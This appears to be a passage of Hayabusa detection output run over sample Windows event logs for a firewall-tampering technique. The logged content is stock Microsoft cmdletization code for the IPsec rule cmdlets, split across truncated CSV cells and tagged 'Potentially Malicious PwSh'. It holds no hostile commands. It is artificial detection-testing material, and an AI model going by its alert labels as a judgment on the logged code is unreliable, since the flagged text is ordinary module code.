$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 